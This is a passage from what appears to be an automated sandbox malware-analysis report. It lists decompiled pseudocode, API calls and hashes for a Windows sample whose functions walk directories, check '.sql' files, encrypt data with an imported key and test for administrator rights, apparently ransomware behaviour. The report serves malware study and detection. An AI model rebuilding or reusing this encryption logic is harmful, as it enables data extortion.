											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0F698260(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0F696B40(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

0x0f696bab
0x0f696baf
0x0f696bbe
0x0f696bc1
0x0f696bc4
0x0f696bde
0x0f696be3
0x0f696be6
0x0f696bf0
0x0f696c00
0x00000000
0x0f696c1c
0x0f696c24
0x0f696c2b
0x0f696c31
0x0f696c34
0x0f696c39
0x0f696d08
0x0f696d08
0x00000000
0x0f696c40
0x0f696c40
0x0f696c46
0x0f696c49
0x0f696c4a
0x00000000
0x00000000
0x00000000
0x0f696c4a
0x0f696c4e
0x00000000
0x0f696c54
0x0f696c5a
0x0f696c5e
0x00000000
0x0f696c64
0x0f696c77
0x0f696c82
0x0f696c86
0x0f696c8f
0x0f696ca0
0x0f696ca4
0x0f696cb7
0x0f696cce
0x0f696cd4
0x0f696cde
0x0f696cde
0x0f696ce9
0x0f696ce9
0x0f696cef
0x0f696cef
0x0f696cf3
0x0f696cf9
0x0f696cfe
0x0f696d0a
0x0f696d0f
0x00000000
0x0f696d0f
0x0f696cfe
0x0f696c5e
0x0f696c4e
0x0f696c39
0x00000000
0x0f696d12
0x0f696d22
0x0f696d2d
0x0f696d3b

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F696BB2
lstrcatW.KERNEL32(00000000,0F69FF44), ref: 0F696BC4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F696BD2
lstrcmpW.KERNEL32(?,0F69FF48,?,?), ref: 0F696BFC
lstrcmpW.KERNEL32(?,0F69FF4C,?,?), ref: 0F696C12
lstrcatW.KERNEL32(00000000,?), ref: 0F696C24
lstrlenW.KERNEL32(00000000,?,?), ref: 0F696C2B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F696C5A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F696C71
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F696C7C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F696C9A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F696CAF
lstrlenA.KERNEL32(*******************,?,?), ref: 0F696CCE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F696CE9
CloseHandle.KERNEL32(00000000,?,?), ref: 0F696CF3
FindNextFileW.KERNEL32(?,?,?,?), ref: 0F696D1C
FindClose.KERNEL32(?,?,?), ref: 0F696D2D

Strings

*******************, xrefs: 0F696CB9, 0F696CC9
.sql, xrefs: 0F696C54

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: b1bd6a7031116c4e587433aa81d691b890ea16b57dd866f1fc54be00701bff1c
Instruction ID: ba330367233f180f2993164a6b8420199b6da0fb2bd40d7b43f136db5a015acb
Opcode Fuzzy Hash: b1bd6a7031116c4e587433aa81d691b890ea16b57dd866f1fc54be00701bff1c
Instruction Fuzzy Hash: E8418E31609319ABDF20AFA0DC49FBE76BCEF05715F405165F901E3241EB7AAA15CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0F696660 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0F696660(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xf6a2a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0F6936C0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xf6a2a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

0x0f69666b
0x0f696671
0x0f696678
0x0f69668d
0x0f696691
0x0f696699
0x0f6966d1
0x0f6966d1
0x0f6966f4
0x0f6966f6
0x0f6966ff
0x0f69670d
0x0f696713
0x0f696719
0x0f696727
0x0f696735
0x0f69673b
0x0f696744
0x0f69674b
0x0f696750
0x0f696750
0x0f69674b
0x0f69675b
0x0f696766
0x00000000
0x0f69676c
0x0f69669b
0x0f6966a6
0x00000000
0x0f6966ca
0x0f6966b7
0x0f6966bf
0x00000000
0x0f6966c8
0x00000000

APIs

EnterCriticalSection.KERNEL32(0F6A2A48,?,0F6938F4,00000000,00000000,00000000,?,00000800), ref: 0F69666B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0F6938F4,00000000,00000000,00000000), ref: 0F696691
GetLastError.KERNEL32(?,0F6938F4,00000000,00000000,00000000), ref: 0F69669B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F6938F4,00000000,00000000,00000000), ref: 0F6966B7
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0F6938F4,00000000,00000000), ref: 0F6966EC
CryptGetKeyParam.ADVAPI32(00000000,00000008,0F6938F4,0000000A,00000000,?,0F6938F4,00000000), ref: 0F69670D
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0F6938F4,?,0F6938F4,00000000), ref: 0F696735
GetLastError.KERNEL32(?,0F6938F4,00000000), ref: 0F69673E
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0F6938F4,00000000,00000000), ref: 0F69675B
LeaveCriticalSection.KERNEL32(0F6A2A48,?,0F6938F4,00000000,00000000), ref: 0F696766

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0F696686, 0F6966AC

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-1948191093
Opcode ID: 70627f4c48b2ed2e0bb5bc856c2702ed6d8684783074138f7b5138f0d55aac72
Instruction ID: e7d1e9f95fa29c512d96f6e62f7d2c461113593f28bce6f09ad89722a184fca9
Opcode Fuzzy Hash: 70627f4c48b2ed2e0bb5bc856c2702ed6d8684783074138f7b5138f0d55aac72
Instruction Fuzzy Hash: CD316E74A44309ABDF10CFE0DD56FAE77BCEB08705F104548F601AA280DBBAAA10DF61

Uniqueness

Uniqueness Score: -1.00%

Function 0F696DF0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F696DF0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0F696BA0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0F696D40(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0F696AB0(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0F696DF0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

0x0f696dfc
0x0f696dff
0x0f696e01
0x0f696e08
0x0f696f36
0x0f696f36
0x0f696f3c
0x0f696e1d
0x0f696e1d
0x0f696e35
0x0f696e38
0x0f696e3b
0x0f696e45
0x0f696e4b
0x0f696e4d
0x0f696e50
0x0f696e56
0x0f696e64
0x0f696e70
0x0f696e7c
0x0f696e82
0x0f696e84
0x0f696e96
0x0f696e9c
0x0f696e9e
0x0f696ea8
0x0f696eaa
0x0f696eb1
0x0f696ee2
0x0f696ee5
0x0f696eea
0x0f696eed
0x0f696eef
0x0f696ef2
0x0f696ef5
0x0f696ef7
0x0f696f00
0x0f696f00
0x0f696f03
0x0f696f03
0x0f696ef9
0x0f696efc
0x0f696efe
0x00000000
0x00000000
0x0f696efe
0x0f696ef7
0x0f696eb3
0x0f696ec7
0x0f696ecc
0x0f696ecc
0x0f696f0e
0x0f696f0e
0x0f696f10
0x0f696f10
0x0f696e9e
0x0f696f1d
0x0f696f23
0x0f696f23
0x0f696f2e
0x00000000
0x0f696e58
0x0f696e63
0x0f696e63
0x0f696e56

APIs

Part of subcall function 0F696780: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F696E06,00000000,?,?), ref: 0F696793
Part of subcall function 0F696780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F696E06,00000000,?,?), ref: 0F69685A
Part of subcall function 0F696780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F696E06,00000000,?,?), ref: 0F696874
Part of subcall function 0F696780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F696E06,00000000,?,?), ref: 0F69688E
Part of subcall function 0F696780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F696E06,00000000,?,?), ref: 0F6968A8

Part of subcall function 0F696BA0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F696BB2
Part of subcall function 0F696BA0: lstrcatW.KERNEL32(00000000,0F69FF44), ref: 0F696BC4
Part of subcall function 0F696BA0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F696BD2
Part of subcall function 0F696BA0: lstrcmpW.KERNEL32(?,0F69FF48,?,?), ref: 0F696BFC
Part of subcall function 0F696BA0: lstrcmpW.KERNEL32(?,0F69FF4C,?,?), ref: 0F696C12
Part of subcall function 0F696BA0: lstrcatW.KERNEL32(00000000,?), ref: 0F696C24
Part of subcall function 0F696BA0: lstrlenW.KERNEL32(00000000,?,?), ref: 0F696C2B
Part of subcall function 0F696BA0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F696C5A
Part of subcall function 0F696BA0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F696C71
Part of subcall function 0F696BA0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F696C7C
Part of subcall function 0F696BA0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F696C9A
Part of subcall function 0F696BA0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F696CAF

Part of subcall function 0F696D40: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F696E22,00000000,?,?), ref: 0F696D55
Part of subcall function 0F696D40: wsprintfW.USER32 ref: 0F696D63
Part of subcall function 0F696D40: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F696D7F
Part of subcall function 0F696D40: GetLastError.KERNEL32(?,?), ref: 0F696D8C
Part of subcall function 0F696D40: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F696DD8

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F696E23
lstrcatW.KERNEL32(00000000,0F69FF44), ref: 0F696E3B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F696E45
lstrcmpW.KERNEL32(?,0F69FF48,?,?), ref: 0F696E7C
lstrcmpW.KERNEL32(?,0F69FF4C,?,?), ref: 0F696E96
lstrcatW.KERNEL32(00000000,?), ref: 0F696EA8
lstrcatW.KERNEL32(00000000,0F69FF7C), ref: 0F696EB9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F696F1D
FindClose.KERNEL32(00003000,?,?), ref: 0F696F2E

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: File$lstrcatlstrcmp$FindFolderPathSpecialVirtual$Alloclstrlen$CreateFirst$CloseErrorFreeLastNextReadSizewsprintf
String ID:
API String ID: 664581897-0
Opcode ID: 42441aac068696c040bacbb31f862cea2921c0822c0969eddf9202b217fb0170
Instruction ID: 1bd3296b5794ad80c17ba7edc1c8778777e3b7fc110dd4d97524e33a09a578e3
Opcode Fuzzy Hash: 42441aac068696c040bacbb31f862cea2921c0822c0969eddf9202b217fb0170
Instruction Fuzzy Hash: CC31B371A0C31DEBCF10AFA4DC849AEB7BDEF45350F044196E805E7251EB36AA50CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0F6934F0 Relevance: 12.1, APIs: 8, Instructions: 79
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F6934F0(CHAR* __ecx, WCHAR** __edx, WCHAR** _a4) {
				int _v8;
				CHAR* _v12;
				WCHAR** _v16;
				long _t11;
				WCHAR* _t17;
				WCHAR* _t18;
				void* _t23;
				void* _t28;
				int _t29;
				WCHAR** _t30;

				_v16 = __edx;
				_v12 = __ecx;
				_t29 = 0;
				_t11 = lstrlenA(__ecx);
				_v8 = _t11;
				_t23 = VirtualAlloc(0, _t11, 0x3000, 4);
				if(_t23 != 0) {
					if(CryptStringToBinaryA(_v12, 0, 1, _t23,  &_v8, 0, 0) != 0) {
						_t17 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t30 = _v16;
						 *_t30 = _t17;
						_t18 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t28 = _t23;
						 *_a4 = _t18;
						if( *_t23 != 0x3b) {
							do {
								_t28 = _t28 + 1;
							} while ( *_t28 != 0x3b);
						}
						 *_t28 = 0;
						wsprintfW( *_t30, L"%S", _t23);
						_t8 = _t28 + 1; // 0x2
						wsprintfW( *_a4, L"%S", _t8);
						_t29 = 1;
					}
					VirtualFree(_t23, 0, 0x8000);
				}
				return _t29;
			}

0x0f6934fa
0x0f6934ff
0x0f693502
0x0f693504
0x0f693519
0x0f69351e
0x0f693522
0x0f69353d
0x0f69354c
0x0f69354e
0x0f69355f
0x0f693561
0x0f693566
0x0f69356b
0x0f69356d
0x0f693570
0x0f693570
0x0f693571
0x0f693570
0x0f693584
0x0f693587
0x0f693589
0x0f693597
0x0f69359c
0x0f69359c
0x0f6935a9
0x0f6935a9
0x0f6935b7

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,0F693673,00000000), ref: 0F693504
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,0F693673,00000000), ref: 0F69351C
CryptStringToBinaryA.CRYPT32(0F693673,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F693535
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F693673,00000000), ref: 0F69354C
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F693673,00000000), ref: 0F693561
wsprintfW.USER32 ref: 0F693587
wsprintfW.USER32 ref: 0F693597
VirtualFree.KERNEL32(00000000,00000000,00008000,?,0F693673,00000000), ref: 0F6935A9

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$BinaryCryptFreeStringlstrlen
String ID:
API String ID: 2885909284-0
Opcode ID: 30fd7affef74f00e15d52ddcd5b2d9bd21f50490ae9defd2eeed0ab17937efcf
Instruction ID: 0ae32125d9647fd310600712ac31f5ad74abf350a55ed399c469c31aeef29c6c
Opcode Fuzzy Hash: 30fd7affef74f00e15d52ddcd5b2d9bd21f50490ae9defd2eeed0ab17937efcf
Instruction Fuzzy Hash: DF21D271A443187FEB219FA88C41F9ABFECEF49760F100061F604E7281D6B56A108B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F693C70 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0F693C70() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x0f693c79
0x0f693c99
0x0f693ca0
0x0f693ca8
0x0f693cbf
0x0f693cce
0x0f693cd5
0x0f693cd7
0x0f693cda
0x0f693ce6
0x0f693cad
0x0f693cad
0x0f693cad

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F693CA0
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0F693CB3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0F693CBF
FreeSid.ADVAPI32(?), ref: 0F693CDA

Strings

CheckTokenMembership, xrefs: 0F693CB9
advapi32.dll, xrefs: 0F693CAE

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: d6dced681349c33529264c92337f29884555cf29449cc8da0f91a8ac9f46cf4c
Instruction ID: f17f863361305a66838f6af09011ba8594eb29d6c739830f9c308487c8d7b47a
Opcode Fuzzy Hash: d6dced681349c33529264c92337f29884555cf29449cc8da0f91a8ac9f46cf4c
Instruction Fuzzy Hash: 1CF04F30A44309BBDF009FE4DC0AFAD77BCEB04716F100584F900E6281E77966148B91

Uniqueness

Uniqueness Score: -1.00%

Function 0F693200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F693200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

0x0f693205
0x0f693208
0x0f69320a
0x0f69320e
0x0f69321f
0x0f69321f
0x0f693223
0x00000000
0x0f693225
0x0f693226
0x0f69322a
0x0f693230
0x0f693235
0x0f693239
0x00000000
0x00000000
0x0f69323b
0x00000000
0x0f693239
0x0f693245
0x0f693245
0x0f693248
0x0f693248
0x0f69324e
0x0f693270
0x0f693273
0x0f693284
0x0f69328a
0x00000000
0x0f69328a
0x0f693250
0x0f693251
0x0f693262
0x0f693268
0x0f69328d
0x0f69328f
0x0f693293
0x0f693293
0x0f69328f
0x0f693299
0x0f6932a5
0x0f6932a5
0x0f693210
0x0f693210
0x0f693214
0x0f693217
0x00000000
0x0f693219
0x0f693219
0x0f69321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f69321d
0x00000000
0x0f693217
0x0f69323e
0x0f693242
0x0f693242
0x00000000

APIs

lstrlenA.KERNEL32(0F695444,00000000,?,0F695445,?,0F6934BF,0F695445,00000001,0F695445,00000000,00000000,00000000,?,?,0F695444,00000000), ref: 0F693251
GetProcessHeap.KERNEL32(00000008,00000001,?,0F6934BF,0F695445,00000001,0F695445,00000000,00000000,00000000,?,?,0F695444,00000000), ref: 0F69325B
HeapAlloc.KERNEL32(00000000,?,0F6934BF,0F695445,00000001,0F695445,00000000,00000000,00000000,?,?,0F695444,00000000), ref: 0F693262
lstrlenA.KERNEL32(0F695444,00000000,?,0F695445,?,0F6934BF,0F695445,00000001,0F695445,00000000,00000000,00000000,?,?,0F695444,00000000), ref: 0F693273
GetProcessHeap.KERNEL32(00000008,00000001,?,0F6934BF,0F695445,00000001,0F695445,00000000,00000000,00000000,?,?,0F695444,00000000), ref: 0F69327D
HeapAlloc.KERNEL32(00000000,?,0F6934BF,0F695445,00000001,0F695445,00000000,00000000,00000000,?,?,0F695444,00000000), ref: 0F693284
lstrcpyA.KERNEL32(00000000,0F695444,?,0F6934BF,0F695445,00000001,0F695445,00000000,00000000,00000000,?,?,0F695444,00000000), ref: 0F693293

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: 1b5c487bffbd6ec814f00e47f3c1dc2f7d40ce2037076589a72d2ae73a0a4e8a
Instruction ID: e8af956a50cf1f46f41c7affd7541c036a12c582c26cfa0fa0f5b26d01ab6a65
Opcode Fuzzy Hash: 1b5c487bffbd6ec814f00e47f3c1dc2f7d40ce2037076589a72d2ae73a0a4e8a
Instruction Fuzzy Hash: AB11B63040C2946EDF211FA89A0D7A6BB9DEF02761F645106E8C5CB342C73AA4568761

Uniqueness

Uniqueness Score: -1.00%

Function 0F691C20 Relevance: .7, Instructions: 721
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0F691C20(signed int* __ebx, signed int* __edi, signed int* __esi) {
				signed int _t514;
				signed char _t522;
				signed char _t530;
				signed char _t538;
				signed char _t546;
				signed char _t554;
				signed char _t562;
				signed char _t570;
				signed char _t578;
				signed char _t586;
				void* _t595;
				signed char _t603;
				signed char _t618;
				signed int _t628;
				signed char _t630;
				signed char _t631;
				signed char _t633;
				signed char _t635;
				signed char _t636;
				signed char _t638;
				signed char _t640;
				signed char _t641;
				signed char _t643;
				signed char _t645;
				signed char _t646;
				signed char _t648;
				signed char _t650;
				signed char _t651;
				signed char _t653;
				signed char _t655;
				signed char _t656;
				signed char _t658;
				signed char _t660;
				signed char _t661;
				signed char _t663;
				signed char _t665;
				signed char _t666;
				signed char _t668;
				signed char _t670;
				signed char _t671;
				signed char _t673;
				signed char _t675;
				signed char _t676;
				signed char _t681;
				signed char _t682;
				signed char _t684;
				signed char _t686;
				signed char _t687;
				signed char _t690;
				signed char _t691;
				signed char _t693;
				signed char _t695;
				signed char _t696;
				signed int _t699;
				signed char _t700;
				signed char _t708;
				signed char _t709;
				signed char _t717;
				signed char _t718;
				signed char _t726;
				signed char _t727;
				signed char _t735;
